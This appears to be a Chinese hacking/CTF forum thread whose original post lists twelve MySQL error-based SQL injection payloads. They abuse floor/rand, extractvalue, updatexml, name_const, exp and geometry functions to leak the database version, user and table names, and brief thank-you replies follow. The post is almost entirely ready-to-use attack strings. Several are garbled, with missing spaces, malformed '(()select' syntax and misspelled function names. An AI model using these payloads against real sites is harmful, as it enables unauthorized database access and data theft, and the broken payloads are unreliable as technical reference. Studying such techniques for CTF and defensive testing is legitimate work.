[CTF知识] sql注入12个报错方式

[复制链接]
查看10787 | 回复6 | 2017-5-31 17:03:42 | 显示全部楼层 |阅读模式
1、通过floor报错,注入语句如下:
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2、通过ExtractValue报错,注入语句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3、通过UpdateXml报错,注入语句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、通过NAME_CONST报错,注入语句如下:
and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、通过join报错,注入语句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;

6、通过exp报错,注入语句如下:
and exp(~(select * from (select user () ) a) );

7、通过GeometryCollection()报错,注入语句如下:
and GeometryCollection(()select *from(select user () )a)b );

8、通过polygon ()报错,注入语句如下:
and polygon (()select * from(select user ())a)b );

9、通过multipoint ()报错,注入语句如下:
and multipoint (()select * from(select user() )a)b );

10、通过multlinestring ()报错,注入语句如下:
and multlinestring (()select * from(selectuser () )a)b );

11、通过multpolygon ()报错,注入语句如下:
and multpolygon (()select * from(selectuser () )a)b );

12、通过linestring ()报错,注入语句如下:
and linestring (()select * from(select user() )a)b );
回复

使用道具 举报

匿名 areyou | 2017-11-20 12:40:14 | 显示全部楼层
感谢分享!!!!
回复

使用道具 举报

匿名 iocmomo | 2017-11-26 17:34:07 | 显示全部楼层

感谢楼主多多分享经验
回复

使用道具 举报

匿名 DDBG | 2017-12-6 21:19:25 | 显示全部楼层
哇,正在学sql注入,谢谢分享
回复

使用道具 举报

匿名 Seesec | 2017-12-13 12:23:41 | 显示全部楼层
谢谢分享经验
回复

使用道具 举报

Be_easy | 2017-12-14 10:53:05 | 显示全部楼层
感谢大佬分享
回复

使用道具 举报

pxjpyp | 2018-5-2 16:47:01 | 显示全部楼层
能有例子就更好了 谢谢分享
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

9

主题

21

帖子

74

积分

版主

Rank: 7Rank: 7Rank: 7

积分
74